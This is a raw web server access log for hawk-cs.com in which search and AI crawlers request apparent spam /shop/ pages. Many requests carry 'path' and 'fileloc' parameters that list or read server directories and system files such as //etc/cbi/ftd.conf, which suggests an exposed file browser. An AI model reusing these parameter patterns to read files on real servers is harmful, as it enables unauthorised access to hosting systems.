2001:a61:2b00:: - - [22/Mar/2026:01:19:22 -0400] "GET /?path=/homepages/11/d1015657415 HTTP/1.1" 200 25536 www.hawk-cs.com "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:22 -0400] "GET /shop/prenote/snappy111296713878.html HTTP/1.1" 200 220895 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:24 -0400] "GET /shop/outlawry/purvey033016427198.html HTTP/1.1" 200 210221 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:19:24 -0400] "GET /shop/spindlelegs/trochlear022199361019.html?path=/homepages/38/d1014936368/htdocs/clickandbuilds/HawkConstruction/adebwp HTTP/1.1" 200 16210 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2001:a61:2b00:: - - [22/Mar/2026:01:19:24 -0400] "GET /?path=/homepages/11/d1015693464 HTTP/1.1" 200 31472 www.hawk-cs.com "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:25 -0400] "GET /shop/intuitionalism/paraquet131067736725.html HTTP/1.1" 200 216109 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:29 -0400] "GET /shop/remover/horsepond091834709336.html HTTP/1.1" 200 214504 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:19:30 -0400] "GET /shop/pretiosum/flurries022497476368.html?path=/homepages/38/d1014936368/htdocs/clickandbuilds/HawkConstruction/images HTTP/1.1" 200 16235 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:31 -0400] "GET /shop/phthongal/protuberantly081998822582.html HTTP/1.1" 200 214636 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:33 -0400] "GET /shop/kindred/culinary11137581699.html HTTP/1.1" 200 221072 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:19:35 -0400] "GET /shop/hoofer/cameronian023074773002.html?path=/homepages/7 HTTP/1.1" 200 65962 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:35 -0400] "GET /shop/levitate/costermonger11668728455.html HTTP/1.1" 200 213949 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:37 -0400] "GET /shop/ankus/suppression113255309386.html HTTP/1.1" 200 206533 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:19:40 -0400] "GET /shop/prompting/cheoplasty00676435253.html?path=/homepages/38/d1015104064 HTTP/1.1" 200 31472 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:40 -0400] "GET /shop/duodenal/selfrespect113431759089.html HTTP/1.1" 200 212014 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
114.119.135.0 - - [22/Mar/2026:01:19:43 -0400] "GET /shop/optable/tangos05529345817.html HTTP/1.1" 200 76933 hawk-cs.com "https://hawk-cs.com/sitemaps.xmlDisallow:%20*/cache/ionos-performance/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:43 -0400] "GET /shop/impanate/americanizing054183603498.html HTTP/1.1" 200 222256 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:44 -0400] "GET /shop/greenstone/footworn111887443016.html HTTP/1.1" 200 206190 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:19:44 -0400] "GET /shop/convoy/lagomyidae022372434017.html?path=/homepages/17 HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:46 -0400] "GET /shop/unharness/abuse13623051057.html HTTP/1.1" 200 209019 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:47 -0400] "GET /shop/bohemion/athiorhodaceae02761266929.html HTTP/1.1" 200 212448 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:48 -0400] "GET /shop/harmlessness/anonymous042874568176.html HTTP/1.1" 200 217326 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:19:49 -0400] "GET /shop/wormiest/aculeatus022962662655.html?path=/homepages/38/d1013185054 HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:19:50 -0400] "GET /shop/bagged/cinematic023314096633.html?path=/homepages/38/d1014936368/htdocs/clickandbuilds/HawkConstruction/.tmb HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:50 -0400] "GET /shop/rootless/catalufa052671395395.html HTTP/1.1" 200 214831 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:52 -0400] "GET /shop/dramatisation/jurisprudence093263044566.html HTTP/1.1" 200 205284 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:54 -0400] "GET /shop/audacity/cered101863407702.html HTTP/1.1" 200 215443 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:19:54 -0400] "GET /shop/whapper/tarheel00694395257.html?path=/homepages/38/d1013131192 HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:19:55 -0400] "GET /shop/halfclammed/osteocope003822676158.html?path=//var HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:19:56 -0400] "GET /shop/calvary/kopek021681928503.html?path=//sbin HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:56 -0400] "GET /shop/quickness/jaganath122532156696.html HTTP/1.1" 200 215050 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:19:58 -0400] "GET /shop/otherworldly/leaseholding152170363648.html HTTP/1.1" 200 221861 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:00 -0400] "GET /shop/canonicals/rhime053282430258.html HTTP/1.1" 200 205087 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
74.7.243.0 - - [22/Mar/2026:01:20:01 -0400] "GET /shop/badgeless/cerolite063904059958.html HTTP/1.1" 200 76933 hawk-cs.com "https://hawk-cs.com/sitemap-sub-2034.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:02 -0400] "GET /shop/exclusionism/biomedicine08153676192.html HTTP/1.1" 200 216245 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:03 -0400] "GET /shop/adult/panhellenist023706394738.html?path=/homepages/38/d1014780234 HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:04 -0400] "GET /shop/limiter/villenage134221848011.html HTTP/1.1" 200 211741 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:05 -0400] "GET /shop/leaden/brownian021446914325.html?path=/homepages/38/d1014936368/htdocs/clickandbuilds HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:06 -0400] "GET /shop/deposer/cinematographic00702360750.html?fileloc=/homepages/38/d1012763793/distributor.lock&path=/homepages/38/d1012763793 HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:07 -0400] "GET /shop/litterer/shrewdness132135739675.html HTTP/1.1" 200 202500 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:09 -0400] "GET /shop/pedunculata/fruitful143723839630.html HTTP/1.1" 200 215408 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:11 -0400] "GET /shop/spicily/emanate00877956820.html HTTP/1.1" 200 219079 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:13 -0400] "GET /shop/shinney/leptoptilos152091661733.html HTTP/1.1" 200 231941 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:15 -0400] "GET /shop/photog/alabastra001764736537.html?path=/homepages/40 HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:15 -0400] "GET /shop/tanach/janthina132614095211.html HTTP/1.1" 200 214932 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:17 -0400] "GET /shop/shrinker/detortion023535745938.html?path=/homepages/38/d1014936368/htdocs/clickandbuilds/HawkConstruction/.local HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:19 -0400] "GET /shop/megaptera/interfulgent023532109625.html?path=/homepages/38/d1013991151 HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:20 -0400] "GET /shop/rehabilitation/handtohand022056055474.html?path=/homepages/26 HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:20 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman1%2Fpiconv.1.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman1 HTTP/1.1" 200 12331 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:20 -0400] "GET /?fileloc=%2F%2Fetc%2Fcbi%2Fftd.conf&path=%2F%2Fetc%2Fcbi HTTP/1.1" 200 13571 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:21 -0400] "GET /shop/tetchy/hooded063413548484.html HTTP/1.1" 200 215980 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:21 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fcprojl.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 12331 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:21 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman1%2Fnano.1.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman1 HTTP/1.1" 200 12329 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:22 -0400] "GET /shop/bedimming/invocate021626537345.html?path=/homepages/38/d1014936368/htdocs/clickandbuilds/HawkConstruction/images HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:22 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FDateTime%3A%3ALocale%3A%3Ada.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 12347 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:22 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FMail%3A%3AMailer.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 12339 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:23 -0400] "GET /shop/depressive/electricity131901611277.html HTTP/1.1" 200 208672 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:23 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FIO%3A%3AWrapTie.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 12338 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:23 -0400] "GET /shop/searcloth/odometry022620354129.html?path=/homepages/38/d1014936368/htdocs/clickandbuilds/HawkConstruction/.tmb HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:23 -0400] "GET /?fileloc=%2F%2Fusr%2Flib%2Fruby%2F2.7.0%2Ferb.rb&path=%2F%2Fusr%2Flib%2Fruby%2F2.7.0 HTTP/1.1" 200 43802 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:24 -0400] "GET /shop/hemophile/queensize35197127949.html HTTP/1.1" 200 213011 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:24 -0400] "GET /shop/smither/representant1047526048.html HTTP/1.1" 200 204488 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:24 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FBSD%3A%3AResource.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 12340 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:25 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Facos.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 12329 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:25 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman1%2Fdb5.3_hotbackup.1.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman1 HTTP/1.1" 200 12340 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:25 -0400] "GET /shop/optically/herpetology003015790796.html?path=/homepages/38/d1016322680 HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:26 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FSpreadsheet%3A%3AWriteExcel%3A%3AProperties.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 12362 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:26 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman1%2Fperlnumber.1.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman1 HTTP/1.1" 200 12335 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:27 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman1%2Fdb5.3_upgrade.1.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman1 HTTP/1.1" 200 12338 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:27 -0400] "GET /shop/twanging/tubulicole07390218117.html HTTP/1.1" 200 207494 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:27 -0400] "GET /shop/coldhearted/stramazoun022570763842.html?path=/homepages/38/d1014936368/htdocs/clickandbuilds/HawkConstruction/wp-admin HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:27 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman1%2Ftcsh.1.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman1 HTTP/1.1" 200 12329 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:28 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fcommon-licenses%2FCC0-1.0&path=%2F%2Fusr%2Fshare%2Fcommon-licenses HTTP/1.1" 200 19440 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:29 -0400] "GET /shop/euisopoda/philanthrope151053720640.html HTTP/1.1" 200 203182 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:30 -0400] "GET /shop/undisputableness/cheeks002154913634.html?path=/homepages/38/d1014936368/managed HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:31 -0400] "GET /shop/millenniarism/guttulous12617017443.html HTTP/1.1" 200 214950 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:32 -0400] "GET /shop/feebleness/inadaptation06868201629.html HTTP/1.1" 200 217777 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:32 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fgetspnam_r.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 12335 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:33 -0400] "GET /shop/prinia/doliolum023054648408.html?path=/homepages/4 HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:33 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman1%2Fshuf.1.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman1 HTTP/1.1" 200 12329 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
